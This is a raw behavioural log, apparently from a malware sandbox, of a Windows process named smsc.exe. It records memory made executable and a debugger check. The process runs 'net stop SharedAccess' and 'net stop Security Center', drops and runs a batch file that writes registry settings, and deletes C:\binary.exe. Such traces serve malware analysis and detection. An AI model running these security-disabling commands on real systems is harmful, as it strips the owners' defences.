Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4161C8 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603485889
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4161CC Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603486089
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4161D0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603486284
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4161D4 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603486497
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4161D8 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603486701
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4161DC Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603486906
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4161E0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603487110
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4161E4 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603487313
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4161E8 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603487519
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4161EC Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603487722
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4161F0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603487927
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4161F4 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603488132
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4161F8 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603488336
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4161FC Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603488540
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416200 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603488744
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416204 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603489015
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4166DC Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603489218
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416008 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603489454
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 41600C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603489666
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416010 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603489871
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416014 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603490076
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416018 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603490279
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 41601C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603490493
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416020 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603490698
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416024 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603490901
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416028 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603491104
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 41602C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603491308
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416030 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603491512
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416034 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603491715
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416038 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603491919
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 41603C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603492122
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416040 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603492325
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416044 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603492528
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416048 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603492732
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 41604C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603492935
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416050 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603493138
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416054 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603493342
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416058 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603493545
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 41605C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603493748
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416060 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603493954
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416064 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603494161
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416068 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603494367
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 41606C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603494571
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416070 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603494775
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416074 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603495429
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416078 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603496253
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 41607C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603496521
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416080 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603498013
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416084 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603498237
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416088 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603498443
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 41608C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603498901
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416090 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603499155
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416094 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603499379
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416098 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603499696
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 41609C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603499975
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4160A0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603500182
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4160A4 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603500387
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4160A8 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603500866
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4160AC Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603501542
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4160B0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603510657
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4160B4 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603510880
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4160B8 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603511085
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4160BC Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603511588
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4160C0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603511804
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4160C4 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603512008
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4160C8 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603523188
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4160CC Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603523417
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4160D0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603523625
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4160D4 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603523831
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4160D8 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603524036
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4160DC Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603524240
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4160E0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603527290
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4160E4 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603527498
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4160E8 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603527918
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4160EC Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603528125
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4160F0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603528323
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4160F4 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603528521
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4160F8 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603528771
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 4160FC Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603528969
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416100 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603529167
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416104 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603529364
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 416108 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1603529560
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 400000 Length: 1000 New Protection: page execute and read and write New Protection: page readonly	success or wait	1603529756
Memory attributes changed	PID: 740 Path: C:\WINDOWS\system32\smsc.exe Base: 400000 Length: 1000 New Protection: page readonly New Protection: NULL	access violation	1603530084
System info queried	Type: KernelDebuggerInformation	success or wait	1603544112
Section loaded	Path: \BaseNamedObjects\Local\C:_Documents and Settings_LocalService_Local Settings_Temporary Internet Files_Content.IE5_index.dat_32768 Access: write Type: image Baseaddress: 3F0000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1604287238
Section loaded	Path: \BaseNamedObjects\Local\C:_Documents and Settings_LocalService_Cookies_index.dat_16384 Access: write Type: image Baseaddress: BF0000 Size: 16384 Protection: read write Mapped to pid: own pid	success or wait	1604308921
Section loaded	Path: \BaseNamedObjects\Local\C:_Documents and Settings_LocalService_Local Settings_History_History.IE5_index.dat_16384 Access: write Type: image Baseaddress: C00000 Size: 16384 Protection: read write Mapped to pid: own pid	success or wait	1604337227
Section loaded	Path: C:\WINDOWS\system32\icmp.dll Access: query and write and read and execute Type: image Baseaddress: 74290000 Size: 16384 Protection: read write Mapped to pid: own pid	success or wait	1604780682
Section loaded	Path: C:\WINDOWS\system32\dnsapi.dll Access: query and write and read and execute Type: image Baseaddress: 76F20000 Size: 159744 Protection: read write Mapped to pid: own pid	success or wait	1604793676
Section loaded	Path: C:\WINDOWS\system32\odbc32.dll Access: query and write and read and execute Type: image Baseaddress: 74320000 Size: 249856 Protection: read write Mapped to pid: own pid	success or wait	1604921415
Section loaded	Path: \KnownDlls\comdlg32.dll Access: write and read and execute Type: image Baseaddress: 763B0000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	1604934975
Section loaded	Path: C:\WINDOWS\system32\odbcint.dll Access: write and read and execute Type: commit Baseaddress: D10000 Size: 94208 Protection: execute Mapped to pid: own pid	success or wait	1605012636
Section loaded	Path: C:\WINDOWS\system32\odbcint.dll Access: query and write and read and execute Type: image Baseaddress: D10000 Size: 94208 Protection: read write Mapped to pid: own pid	image not at base	1605020248
Section loaded	Path: C:\WINDOWS\system32\odbcint.dll Access: query and write and read and execute Type: image Baseaddress: D10000 Size: 94208 Protection: read write Mapped to pid: own pid	conflicting addresses	1605024377
Section loaded	Path: C:\WINDOWS\system32\psapi.dll Access: query and write and read and execute Type: image Baseaddress: 76BF0000 Size: 45056 Protection: read write Mapped to pid: own pid	success or wait	1605040761
Section loaded	Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: image Baseaddress: D30000 Size: 57344 Protection: read write Mapped to pid: own pid	success or wait	1605062574
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: write and read and execute Type: commit Baseaddress: D40000 Size: 126976 Protection: execute Mapped to pid: own pid	success or wait	1605069300
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: query and write and read and execute Type: image Baseaddress: 77B40000 Size: 139264 Protection: read write Mapped to pid: own pid	success or wait	1605078434
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: D40000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1605087748
Section loaded	Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: image Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1605128779
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: write and read and execute Type: commit Baseaddress: E70000 Size: 389120 Protection: execute Mapped to pid: own pid	success or wait	1605186446
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: E70000 Size: 389120 Protection: readonly Mapped to pid: own pid	success or wait	1605208240
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: write and read and execute Type: commit Baseaddress: E70000 Size: 389120 Protection: execute Mapped to pid: own pid	success or wait	1605289741
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: E70000 Size: 389120 Protection: readonly Mapped to pid: own pid	success or wait	1605299516
Process created	PID: 1944 Path: C:\WINDOWS\system32\cmd.exe Cmdline: cmd /c net stop SharedAccess Createflags: 0	success or wait	1605366817
File created	Path: c:\sdfeww.bat Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false	success or wait	1607879318
File write	Path: C:\sdfeww.bat Offset: none Length: 1350 Value: 40 65 63 68 6F 20 6F 66 66 0D 0A 45 63 68 6F 20 52 45 47 45 44 49 54 34 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D	success or wait	1607929920
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: D40000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1607992236
Process created	PID: 1292 Path: C:\WINDOWS\system32\cmd.exe Cmdline: cmd /c c:\sdfeww.bat Createflags: suspended	success or wait	1608095598
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: D40000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1610636759
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: write and read and execute Type: commit Baseaddress: E70000 Size: 389120 Protection: execute Mapped to pid: own pid	success or wait	1610648674
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: E70000 Size: 389120 Protection: readonly Mapped to pid: own pid	success or wait	1610653675
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: write and read and execute Type: commit Baseaddress: E70000 Size: 389120 Protection: execute Mapped to pid: own pid	success or wait	1610659381
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: E70000 Size: 389120 Protection: readonly Mapped to pid: own pid	success or wait	1610665009
Process created	PID: 1692 Path: C:\WINDOWS\system32\cmd.exe Cmdline: cmd /c net stop Security Center Createflags: 0	success or wait	1610672679
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: D40000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1611349100
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: write and read and execute Type: commit Baseaddress: E70000 Size: 389120 Protection: execute Mapped to pid: own pid	success or wait	1611423304
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: E70000 Size: 389120 Protection: readonly Mapped to pid: own pid	success or wait	1611431302
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: write and read and execute Type: commit Baseaddress: E70000 Size: 389120 Protection: execute Mapped to pid: own pid	success or wait	1611478726
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: E70000 Size: 389120 Protection: readonly Mapped to pid: own pid	success or wait	1611485988
Process created	PID: 444 Path: C:\WINDOWS\system32\cmd.exe Cmdline: cmd /c net start SharedAccess Createflags: 0	success or wait	1611502387
Thread created	PID: 740 TID: 1184 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1612226930
Thread created	PID: 740 TID: 948 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1612300874
Mutant created	Name: \BaseNamedObjects\dfgregrethgsnghjdg434grthgwer443we123	success or wait	1612545692
Key value queried	Path: HKEY_LOCAL_MACHINE\SYSTEM\Setup Name: systemdates	success or wait	1612651816
File other operation	Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\binary.exe	success or wait	1612690297
File deleted	Path: C:\binary.exe	cannot delete	1612723149
Thread delayed	Time: 2 TID: 2376	success or wait	1612728664
File deleted	Path: C:\binary.exe	success or wait	1619882256
Thread delayed	Time: 2 TID: 2376	success or wait	1619887185
Section loaded	Path: C:\WINDOWS\system32\mswsock.dll Access: write and read and execute Type: commit Baseaddress: 1040000 Size: 245760 Protection: execute Mapped to pid: own pid	success or wait	1627862117
Section loaded	Path: C:\WINDOWS\system32\mswsock.dll Access: query and write and read and execute Type: image Baseaddress: 71A50000 Size: 258048 Protection: read write Mapped to pid: own pid	success or wait	1627868054
Section loaded	Path: C:\WINDOWS\system32\winrnr.dll Access: write and read and execute Type: commit Baseaddress: 1040000 Size: 20480 Protection: execute Mapped to pid: own pid	success or wait	1627971488
Section loaded	Path: C:\WINDOWS\system32\winrnr.dll Access: query and write and read and execute Type: image Baseaddress: 76FB0000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1628026865
Section loaded	Path: \KnownDlls\WLDAP32.dll Access: write and read and execute Type: image Baseaddress: 76F60000 Size: 180224 Protection: read write Mapped to pid: own pid	success or wait	1628142625
Section loaded	Path: C:\WINDOWS\system32\rasadhlp.dll Access: query and write and read and execute Type: image Baseaddress: 76FC0000 Size: 24576 Protection: read write Mapped to pid: own pid	success or wait	1628377936
Thread created	PID: 740 TID: 2516 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1628423041
Thread delayed	Time: 12 TID: 9494	success or wait	1628436672
Key value set	Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control Name: WaitToKillServiceTimeout Type: String Data: 7000	success or wait	1628436933
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings Name: ComputerName	success or wait	1629791275
Section loaded	Path: C:\WINDOWS\system32\rasapi32.dll Access: query and write and read and execute Type: image Baseaddress: 76EE0000 Size: 245760 Protection: read write Mapped to pid: own pid	success or wait	1630504826
Section loaded	Path: C:\WINDOWS\system32\rasman.dll Access: query and write and read and execute Type: image Baseaddress: 76E90000 Size: 73728 Protection: read write Mapped to pid: own pid	success or wait	1630531170
Section loaded	Path: C:\WINDOWS\system32\tapi32.dll Access: query and write and read and execute Type: image Baseaddress: 76EB0000 Size: 192512 Protection: read write Mapped to pid: own pid	success or wait	1630582990
Section loaded	Path: C:\WINDOWS\system32\rtutils.dll Access: query and write and read and execute Type: image Baseaddress: 76E80000 Size: 57344 Protection: read write Mapped to pid: own pid	success or wait	1630645581
Section loaded	Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid	success or wait	1630746807
Section loaded	Path: C:\WINDOWS\system32\tapi32.dll Access: read Type: commit Baseaddress: 1450000 Size: 184320 Protection: readonly Mapped to pid: own pid	success or wait	1631030495
Section loaded	Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: image Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid	success or wait	1631156399
Section loaded	Path: C:\WINDOWS\system32\msapsspc.dll Access: query and write and read and execute Type: image Baseaddress: 71E50000 Size: 86016 Protection: read write Mapped to pid: own pid	success or wait	1631426775
Section loaded	Path: C:\WINDOWS\system32\msvcrt40.dll Access: query and write and read and execute Type: image Baseaddress: 78080000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1631506956
Section loaded	Path: C:\WINDOWS\system32\schannel.dll Access: query and write and read and execute Type: image Baseaddress: 767F0000 Size: 163840 Protection: read write Mapped to pid: own pid	success or wait	1631802485
Section loaded	Path: C:\WINDOWS\system32\crypt32.dll Access: query and write and read and execute Type: image Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid	success or wait	1631839562
Section loaded	Path: C:\WINDOWS\system32\msasn1.dll Access: query and write and read and execute Type: image Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid	success or wait	1631893952
Section loaded	Path: C:\WINDOWS\system32\digest.dll Access: query and write and read and execute Type: image Baseaddress: 75B00000 Size: 86016 Protection: read write Mapped to pid: own pid	success or wait	1632112612
Section loaded	Path: C:\WINDOWS\system32\msnsspc.dll Access: query and write and read and execute Type: image Baseaddress: 747B0000 Size: 290816 Protection: read write Mapped to pid: own pid	success or wait	1632425365
Section loaded	Path: C:\WINDOWS\system32\msvcrt40.dll Access: query and write and read and execute Type: image Baseaddress: 78080000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1632437199
Section loaded	Path: C:\WINDOWS\system32\msv1_0.dll Access: write and read and execute Type: commit Baseaddress: 1450000 Size: 139264 Protection: execute Mapped to pid: own pid	success or wait	1632572224
Section loaded	Path: C:\WINDOWS\system32\msv1_0.dll Access: query and write and read and execute Type: image Baseaddress: 77C70000 Size: 151552 Protection: read write Mapped to pid: own pid	success or wait	1632584081
Section loaded	Path: C:\WINDOWS\system32\cryptdll.dll Access: query and write and read and execute Type: image Baseaddress: 76790000 Size: 49152 Protection: read write Mapped to pid: own pid	success or wait	1632617229
Section loaded	Path: C:\WINDOWS\system32\sensapi.dll Access: query and write and read and execute Type: image Baseaddress: 722B0000 Size: 20480 Protection: read write Mapped to pid: own pid	success or wait	1635283085
Section loaded	Path: \BaseNamedObjects\SENS Information Cache Access: read Type: image Baseaddress: 1450000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1635395653
Section loaded	Path: C:\WINDOWS\system32\en-us\wininet.dll.mui Access: query and read Type: commit Baseaddress: 1460000 Size: 53248 Protection: write copy Mapped to pid: own pid	success or wait	1636001759
System info queried	Type: BasicInformation	success or wait	1636035403
Section loaded	Path: C:\WINDOWS\system32\hnetcfg.dll Access: query and write and read and execute Type: image Baseaddress: 662B0000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	1636104190
Section loaded	Path: C:\WINDOWS\system32\wshtcpip.dll Access: write and read and execute Type: commit Baseaddress: 1470000 Size: 20480 Protection: execute Mapped to pid: own pid	success or wait	1636457710
Section loaded	Path: C:\WINDOWS\system32\wshtcpip.dll Access: query and write and read and execute Type: image Baseaddress: 71A90000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1636462422
Thread delayed	Time: 12 TID: 9494	success or wait	1671369957
Thread delayed	Time: 12 TID: 9494	success or wait	1714329610
Thread created	PID: 740 TID: 3900 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1751167528
Thread created	PID: 740 TID: 3904 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1751640289
Thread created	PID: 740 TID: 3908 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1751682720
Thread delayed	Time: 2 TID: 2376	success or wait	1755642271
Thread delayed	Time: 12 TID: 9494	success or wait	1757285127
System info queried	Type: ProcessInformation	success or wait	1765559381
Section loaded	Path: none Access: query and write and read Type: commit Baseaddress: 1790000 Size: 12288 Protection: read write Mapped to pid: own pid	success or wait	1765571914
Section loaded	Path: none Access: query and write and read Type: commit Baseaddress: 1790000 Size: 12288 Protection: read write Mapped to pid: own pid	success or wait	1765572918
Section loaded	Path: none Access: query and write and read Type: commit Baseaddress: 1470000 Size: 12288 Protection: read write Mapped to pid: own pid	success or wait	1765574775
Section loaded	Path: none Access: query and write and read Type: commit Baseaddress: 1470000 Size: 12288 Protection: read write Mapped to pid: own pid	success or wait	1765575952
Section loaded	Path: none Access: query and write and read Type: commit Baseaddress: 1470000 Size: 12288 Protection: read write Mapped to pid: own pid	success or wait	1765617754
